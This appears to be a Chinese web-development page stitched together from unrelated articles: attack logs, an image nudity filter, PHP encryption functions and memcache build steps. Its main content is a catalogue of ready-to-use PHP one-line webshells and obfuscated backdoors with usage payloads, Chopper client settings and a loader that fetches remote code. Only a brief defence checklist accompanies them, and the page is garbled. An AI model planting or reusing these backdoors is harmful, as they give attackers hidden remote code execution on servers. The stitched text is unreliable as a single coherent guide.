实例演示站点安全漏洞分析与建议报告

网站的安全漏洞对于网站来讲是一个非常严重的问题了，如果安全没有做好我们网站数据都有可能给爆或删除，下面我来给大家整理一个关于网站安全漏洞问题分析，以一个网站为例子吧。

	  

		
 代码如下
		
复制代码
	  
	  

		
1.80.76.136 - - [22/Feb/2014:16:01:26 +0800] "GET /css_edit/css.php HTTP/1.1" 200 45841
1.80.76.136 - - [22/Feb/2014:16:01:43 +0800] "POST /css_edit/css.php HTTP/1.1" 200 45969
1.80.76.136 - - [22/Feb/2014:16:03:30 +0800] "POST /css_edit/css.php HTTP/1.1" 200 45943
1.80.76.136 - - [22/Feb/2014:16:06:43 +0800] "POST /css_edit/css.php HTTP/1.1" 200 45958
1.80.76.136 - - [22/Feb/2014:16:06:47 +0800] "GET /css_edit/css.php HTTP/1.1" 200 45841
1.80.76.136 - - [22/Feb/2014:16:09:41 +0800] "GET /css_edit/css.php HTTP/1.1" 404 214
1.80.76.136 - - [22/Feb/2014:19:17:11 +0800] "GET /css_edit/css-bak/css.php HTTP/1.1" 500 -
1.80.76.136 - - [22/Feb/2014:19:17:44 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 458
1.80.76.136 - - [22/Feb/2014:19:17:50 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 3463
222.90.106.49 - - [27/Feb/2014:19:55:17 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 3297
222.90.106.49 - - [27/Feb/2014:19:55:25 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 115
222.90.106.49 - - [27/Feb/2014:19:55:27 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 734
222.90.106.49 - - [27/Feb/2014:19:55:42 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 1370
222.90.106.49 - - [27/Feb/2014:19:55:54 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 4123
222.90.106.49 - - [27/Feb/2014:19:56:07 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 4187
222.90.106.49 - - [27/Feb/2014:19:56:15 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 996
222.90.106.49 - - [27/Feb/2014:19:56:17 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 1088
222.90.106.49 - - [27/Feb/2014:19:56:25 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 830
222.90.106.49 - - [27/Feb/2014:19:56:51 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 33488
222.90.106.49 - - [27/Feb/2014:19:57:11 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 226
222.90.106.49 - - [27/Feb/2014:19:57:12 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 73
222.90.106.49 - - [27/Feb/2014:19:57:17 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 273
222.90.106.49 - - [27/Feb/2014:19:57:20 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 73
1.86.179.21 - - [03/Mar/2014:13:26:43 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 47454
1.86.179.21 - - [03/Mar/2014:13:27:08 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 43
1.86.179.21 - - [03/Mar/2014:13:27:21 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 7
1.86.179.21 - - [03/Mar/2014:13:27:21 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 500 161
1.86.179.21 - - [03/Mar/2014:13:27:38 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 500 161
1.86.179.21 - - [03/Mar/2014:13:28:57 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 500 161
1.86.179.21 - - [03/Mar/2014:13:29:02 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 500 161
1.86.179.21 - - [03/Mar/2014:13:30:28 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 -
1.86.179.21 - - [03/Mar/2014:13:30:32 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 -
1.86.179.21 - - [03/Mar/2014:13:30:35 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 -
1.86.179.21 - - [03/Mar/2014:13:30:47 +0800] "POST /css_edit/css-bak/css.php?2=assert HTTP/1.1" 200 6
 

	  
	
二、演示入侵点

在这份教程中，我们将会学习到如何阻止用户通过上传不雅图片了，这个测试了一下只有一点作用，但人家真的要做了估计也没有办法了，下面来给大家介绍解决办法吧.

下载:http://www.rrpowered.com/code/RRPowered-NudityFilter.zip

我在phpclasses.org上面偶然发现一个很有用的，由Bakr Alsharif开发的可以帮助开发者基于皮肤像素点来检测图片的类文件.
　　它会分析在一张图片的不同部分使用的颜色，并决定其是否匹配人类皮肤颜色的色调.
　　作为分析的结果，他会返回一个反映图片包含xx露的可能性的分值.
　　此外，他还可以输出被分析的图片，上面对使用给定颜色的肤色的像素进行了标记.
　　当前它可以对PNG，GIF和JPEG图片进行分析.

PHP
　　下面展示了如何使用这个PHP类.
　　让我们先从包含过滤器，nf.php文件开始.

代码如下	复制代码
include('nf.php');

接下来，创建一个新的名叫ImageFilter的类，然后把它放到一个叫做$filter的变量中.

 

代码如下	复制代码
$filter = new ImageFilter;

获取图片的分值并将其放到一个$score变量中.

代码如下	复制代码
$score = $filter -> GetScore($_FILES['img']['tmp_name']);

如果图片分值大于或等于60%，那就展示一条（告警）消息.

代码如下	复制代码
if($score >= 60){ /*Message*/ }

下面是所有的PHP代码:

代码如下

复制代码

<?php /*Include the Nudity Filter file*/ include ('nf.php'); /*Create a new class called $filter*/ $filter = new ImageFilter; /*Get the score of the image*/ $score = $filter -> GetScore($_FILES['img']['tmp_name']); /*If the $score variable is set*/ if (isset($score)) {     /*If the image contains nudity, display image score and message. Score value if more than 60%, it is considered an adult image.*/     if ($score >= 60) {         echo "Image scored " . $score . "%, It seems that you have uploaded a nude picture.";     /*If the image doesn't contain nudity*/        } else if ($score < 0) {         echo "Congratulations, you have uploaded an non-nude image.";     } } ?>

标记语言

我们可以使用一个基础的HTML表单上传图片.

代码如下	复制代码
<form method="post" enctype="multipart/form-data" action="<?php echo $SERVER['PHP_SELF'];?> "> Upload image: <input type="file" name="img" id="img" /> <input type="submit" value="Sumit Image" /> </form>

总结

请记得，PHP不能够检测所有的图片，所以不完全可信.我希望你觉得这还有点用处.

 

这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马

 利用404页面隐藏PHP小马

代码如下	复制代码
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>

404页面是网站常用的文件，一般建议好后很少有人会去对它进行检查修改，这时我们可以利用这一点进行隐藏后门。
无特征隐藏PHP一句话

代码如下	复制代码
<?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

将$_POST['code']的内容赋值给$_SESSION['theCode']，然后执行$_SESSION['theCode']，亮点是没有特征码。用扫描工具来检查代码的话，是不会报警的，达到目的了。

超级隐蔽的PHP后门

代码如下	复制代码
<?php $_GET[a]($_GET[b]);?>

仅用GET函数就构成了木马；

利用方法：

代码如下	复制代码
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%    29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但会生成木马，真可谓不可小视，简简单单的一句话，被延伸到这般应用。
层级请求，编码运行PHP后门

此方法用两个文件实现，文件1

代码如下	复制代码
<?php //1.php header('Content-type:text/html;charset=utf-8'); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10' && count($a) == 9) {    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6))))); }

文件2

代码如下

复制代码

<?php //2.php header('Content-type:text/html;charset=utf-8'); //要执行的代码 $code = <<<CODE phpinfo(); CODE; //进行base64编码 $code = base64_encode($code); //构造referer字符串 $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i="; //后门url $url = 'http://localhost/test1/1.php'; $ch = curl_init(); $options = array(     CURLOPT_URL => $url,     CURLOPT_HEADER => FALSE,     CURLOPT_RETURNTRANSFER => TRUE,     CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echo curl_exec($ch);

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码，来达到后门的效果，一般waf对referer这些检测要松一点，或者没有检测。用这个思路bypass waf不错。
PHP后门生成工具weevely

weevely是一款针对PHP的webshell的自由软件，可用于模拟一个类似于telnet的连接shell，weevely通常用于web 程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web 页面式的管理，weevely生成的服务器端php代码是经过了base64编码的，所以可以骗过主流的杀毒软件和IDS，上传服务器端代码后通常可以通 过weevely直接运行。

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术，后门中所使用的函数均是常用的字符串处理函 数，被作为检查规则的eval，system等函数都不会直接出现在代码中，从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具 进行扫描，结果显示该文件无任何威胁。

以上是大概介绍下边是截图，相关使用方法亦家就不在这介绍了，简单的科普一下。

PHP一句话生成工具

三个变形的一句话PHP木马
第一个

代码如下	复制代码
<?php ($_=@$_GET[2]).@$_($_POST[1])?>

在菜刀里写http://site/1.php?2=assert密码是1

第二个

代码如下	复制代码
<?php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。
如果你用菜刀的附加数据的话更隐蔽，或者用其它注射工具也可以，因为是post提交的。

第三个

代码如下	复制代码
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); str_rot13(‘riny’)即编码后的eval，完全避开了关键字，又不失效果，让人吐血！ .htaccess做PHP后门 这个其实在2007年的时候作者GaRY就爆出了，只是后边没人关注，这个利用关键点在于一句话： AddType application/x-httpd-php .htaccess ###### SHELL ###### 这里写上你的后门吧###### LLEHS ######

toby57解析加密一句话木马

此段后门使用方法会与其它方法不太一样，具体看下面

代码如下

复制代码

Client： <?php if(crypt($_SERVER['HTTP_H0ST'],51)=='514zR17F8j0q6'){@file_put_contents($_SERVER['HTTP_X'],$_SERVER['HTTP_Y']); header("Location: ./".$_SERVER['HTTP_X']);}; ?> Server: <?php $fp = fsockopen("127.0.0.1",80,$errno,$errstr,5); if (!$fp){ echo('fp fail'); } $out = "GET /php_muma/client.php HTTP/1.1\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded\r\n"; $out .= "User-Agent: MSIE\r\n"; $out .= "Host: 127.0.0.1\r\n"; $out .= "H0ST: qiushui51a\r\n"; $out .= "X: ../shell.php \r\n"; $out .= "Y: <?php eval(\$_POST1);?>\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp,$out); while(!feof($fp)){ $resp_str=""; $resp_str .= fgets($fp,512);//返回值放入$resp_str } fclose($fp); echo($resp_str);//处理返回值. ?>

对服务端与客户端指令对比，如一致则执行后门指令。
几个President分享的PHP一句话

代码如下

复制代码

<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['sz']); ?> <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);?> <?php $a = "a"."s"."s"."e"."r"."t";  $a($_POST["sz"]); ?> <?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> //上面这个密码-7

最后列几个高级的PHP一句话木马后门

代码如下

复制代码

1、 $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 2、 $filename=$_GET['xbid']; include ($filename); //危险的include函数，直接编译任何文件为php格式运行 3、 $reg="c"."o"."p"."y"; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); //重命名任何文件 4、 $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $gzid("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 5、include ($uid); //危险的include函数，直接编译任何文件为php格式运行，POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif //gif插一句话 6、典型一句话 程序后门代码 <?php eval_r($_POST[sb])?> 程序代码 <?php @eval_r($_POST[sb])?> //容错代码 程序代码 <?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句 程序代码 <?$_POST['sa']($_POST['sb']);?> 程序代码 <?$_POST['sa']($_POST['sb'],$_POST['sc'])?> 程序代码 <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?> //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 程序代码 <O>h=@eval_r($_POST1);</O> 程序代码 <script language="php">@eval_r($_POST[sb])</script> //绕过<?限制的一句话

一款萎缩的动态生成远端大马后门

Webshell代码如下：

代码如下	复制代码
<?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649); @preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null); ?>

其实这款后门在某地，还有Tools上先前已经被破，但没有被拿出来公开分析分享，而今天看到360卫士对该SHELL进行了公开分析……，在360公开后，作者blackbin也进行了小幅更新，新版本不在使用高危函数例如 preg_replace e修饰符同时php5.5已经去掉e 不再使用 eval 不在使用assert采用新的匿名方式回调。
代码如下：

代码如下

复制代码

<?php error_reporting(0); $i = pack('c*', 0x70, 0x61, 99, 107); $GLOBALS = array(     'p' => pack('c*', 0x70, 0x61, 99, 107),     'c' => $i('c*', 99, 97, 108, 108, 95, 117, 115, 101, 114, 95, 102, 117, 110, 99),     'f' => $i('c*', 102, 105, 108, 101, 95, 103, 101, 116, 95, 99, 111, 110, 116, 101, 110, 116, 115),     'e' => $i('c*',0x63,0x72,0x65,0x61,0x74,0x65,0x5f,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e),     'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),     's' =>$i('c*',0x73,0x70,0x72,0x69,0x6e,0x74,0x66) ); $GLOBALS['c']($GLOBALS['e'](false, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$GLOBALS['f']($GLOBALS['h']))))); ?>

关于这款后门的使用方法，首先要有远端大马，然后后门页其实是一个404伪装页，需要按键盘p键，就会显示登录页，关于此后门的最新代码方法可访问上边作者页获取！

综上，这些PHP一句话后门可谓五脏俱全，一不小心您肯定中招了，而我们今天这篇文章的重中之重在哪呢？重点就在下边的总结!
如何应对PHP一句话后门

我们强调几个关键点，看这文章的你相信不是门外汉，我也就不??铝耍?/p>

    对PHP程序编写要有安全意识
    服务器日志文件要经常看，经常备份
    对每个站点进行严格的权限分配
    对动态文件及目录经常批量安全审查
    学会如何进行手工杀毒《即行为判断查杀》
    时刻关注，或渗入活跃的网络安全营地
    对服务器环境层级化处理，哪怕一个函数也可做规则

当管理的站点多了，数据量大时，我们应合理应用一些辅助工具，但不应完全依赖这些工具，技术是时刻在更新进步的，最为重要的是你应学会和理解，编写这些强悍后门的人所处思维，角色上的换位可为你带来更大的进步。

项目中有时我们需要使用PHP将特定的信息进行加密，也就是通过加密算法生成一个加密字符串，这个加密后的字符串可以通过解密算法进行解密，便于程序对解密后的信息进行处理

最常见的应用在用户登录以及一些API数据交换的场景。
笔者收录了一些比较经典的PHP加密解密函数代码，分享给大家。加密解密原理一般都是通过一定的加密解密算法，将密钥加入到算法中，最终得到加密解密结果。
1、非常给力的authcode加密函数，Discuz!经典代码（带详解）：
 

代码如下

复制代码

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {       // 动态密匙长度，相同的明文会生成不同密文就是依靠动态密匙       $ckey_length = 4;              // 密匙       $key = md5($key ? $key : $GLOBALS['discuz_auth_key']);              // 密匙a会参与加解密       $keya = md5(substr($key, 0, 16));       // 密匙b会用来做数据完整性验证       $keyb = md5(substr($key, 16, 16));       // 密匙c用于变化生成的密文       $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';       // 参与运算的密匙       $cryptkey = $keya.md5($keya.$keyc);       $key_length = strlen($cryptkey);       // 明文，前10位用来保存时间戳，解密时验证数据有效性，10到26位用来保存$keyb(密匙b)，     //解密时会通过这个密匙验证数据完整性       // 如果是解码的话，会从第$ckey_length位开始，因为密文前$ckey_length位保存 动态密匙，以保证解密正确       $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) :  sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;       $string_length = strlen($string);       $result = '';       $box = range(0, 255);       $rndkey = array();       // 产生密匙簿       for($i = 0; $i <= 255; $i++) {           $rndkey[$i] = ord($cryptkey[$i % $key_length]);       }       // 用固定的算法，打乱密匙簿，增加随机性，好像很复杂，实际上对并不会增加密文的强度       for($j = $i = 0; $i < 256; $i++) {           $j = ($j + $box[$i] + $rndkey[$i]) % 256;           $tmp = $box[$i];           $box[$i] = $box[$j];           $box[$j] = $tmp;       }       // 核心加解密部分       for($a = $j = $i = 0; $i < $string_length; $i++) {           $a = ($a + 1) % 256;           $j = ($j + $box[$a]) % 256;           $tmp = $box[$a];           $box[$a] = $box[$j];           $box[$j] = $tmp;           // 从密匙簿得出密匙进行异或，再转成字符           $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));       }       if($operation == 'DECODE') {          // 验证数据有效性，请看未加密明文的格式           if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) &&  substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {               return substr($result, 26);           } else {               return '';           }       } else {           // 把动态密匙保存在密文里，这也是为什么同样的明文，生产不同密文后能解密的原因           // 因为加密后的密文可能是一些特殊字符，复制过程可能会丢失，所以用base64编码           return $keyc.str_replace('=', '', base64_encode($result));       }   }

函数authcode($string, $operation, $key, $expiry)中的$string：字符串，明文或密文；$operation：DECODE表示解密，其它表示加密；$key：密匙；$expiry：密文有效期。
用法：

代码如下	复制代码
$str = 'abcdef'; $key = 'www.111cn.net'; echo authcode($str,'ENCODE',$key,0); //加密 $str = '56f4yER1DI2WTzWMqsfPpS9hwyoJnFP2MpC8SOhRrxO7BOk'; echo authcode($str,'DECODE',$key,0); //解密

2、加解密函数encrypt()：
 

代码如下

复制代码

function encrypt($string,$operation,$key=''){     $key=md5($key);     $key_length=strlen($key);       $string=$operation=='D'?base64_decode($string):substr(md5($string.$key),0,8).$string;     $string_length=strlen($string);     $rndkey=$box=array();     $result='';     for($i=0;$i<=255;$i++){            $rndkey[$i]=ord($key[$i%$key_length]);         $box[$i]=$i;     }     for($j=$i=0;$i<256;$i++){         $j=($j+$box[$i]+$rndkey[$i])%256;         $tmp=$box[$i];         $box[$i]=$box[$j];         $box[$j]=$tmp;     }     for($a=$j=$i=0;$i<$string_length;$i++){         $a=($a+1)%256;         $j=($j+$box[$a])%256;         $tmp=$box[$a];         $box[$a]=$box[$j];         $box[$j]=$tmp;         $result.=chr(ord($string[$i])^($box[($box[$a]+$box[$j])%256]));     }     if($operation=='D'){         if(substr($result,0,8)==substr(md5(substr($result,8).$key),0,8)){             return substr($result,8);         }else{             return'';         }     }else{         return str_replace('=','',base64_encode($result));     } }

函数encrypt($string,$operation,$key)中$string：需要加密解密的字符串；$operation：判断是加密还是解密，E表示加密，D表示解密；$key：密匙。
用法：

代码如下	复制代码
$str = 'abc'; $key = 'www.111cn.net'; $token = encrypt($str, 'E', $key); echo '加密:'.encrypt($str, 'E', $key); echo '解密：'.encrypt($str, 'D', $key);

Memcache是一个高性能的分布式的内存对象缓存系统，通过在内存里维护一个统一的巨大的hash表，它能够用来存储各种格式的数据，包括图像、视频、文件以及数据库检索的结果等。简单的说就是将数据调用到内存中，然后从内存中读取，从而大大提高读取速度。

本篇主要简述编译php及其扩展memcache，在阅读后面内容之前，建议先阅读一下官方文档（地址）。下面我们以php5.3为例。

一、编译环境

根据你的php版本选择相应的编译器：

php 5.3-5.4 ：Visual C++ 9.0（Visual Studio 2008）

php 5.5+ ：Visual C++ 11.0（Visual Studio 2012）

如果是php5.3-5.4，还要下载Windows SDK 6.1（下载地址）

 

二、编译文件

1、下载php源代码，http://snaps.php.net/

2、下载php sdk文件，http://windows.php.net/downloads/php-sdk/

那么我们这里下载这两个文件。

3、下载memcache扩展代码包，http://pecl.php.net/package/memcache

三、编译工作

1、创建编译目录“C:\php_sdk”

2、解压php-sdk-binary-tools-20110915.zip里面的文件到php_sdk目录下

3、在开始菜单找到并打开Windows SDK CMD Shell，然后执行

setenv /x86 /xp /release
cd php_sdk
bin\phpsdk_setvars.bat
bin\phpsdk_buildtree.bat phpdev

执行后，目录下会生成phpdev文件夹

4、进入C:\php_sdk\phpdev\vc9\x86\，把deps-5.3-vc9-x86.7z解压到该目录下，覆盖deps文件夹。

5、把php源代码也解压到x86目录下。

6、在x86目录下创建pecl文件夹，把memcache压缩包内容解压到pecl目录，并把文件夹名memcache-2.2.7改为memcache

7、在x86目录下创建obj文件夹，用于保存编译时生成的文件

8、执行以下命令，用于创建php编译配置

cd phpdev\vc9\x86\php5.3-201308211030
buildconf
configure --help >..\configure_help.txt
configure --disable-all --enable-snapshot-build --enable-cli --enable-cgi --enable-memcache=shared --enable-object-out-dir=..\obj --enable-session

注：配置中的–enable-memcache=shared意思是memcache要生成dll，否则就会和php打包到一起了

9、编译php，执行以下命令

nmake

10、如果想打包php，执行以下命令

nmake snap

到这里，编译工作应该结束了。可以在C:\php_sdk\phpdev\vc9\x86\obj\ReleaseTS\目录中找到php_memcache.dll

四、结束语

这篇文章讲述如何编译php及其本身自带的php扩展，与之前写的windows下编译php扩展 eAccelerator做区别。还可以生成哪些php扩展，具体可以看x86目录刚刚生成的帮助文档configure_help.txt

原文来自:lvtao.net博客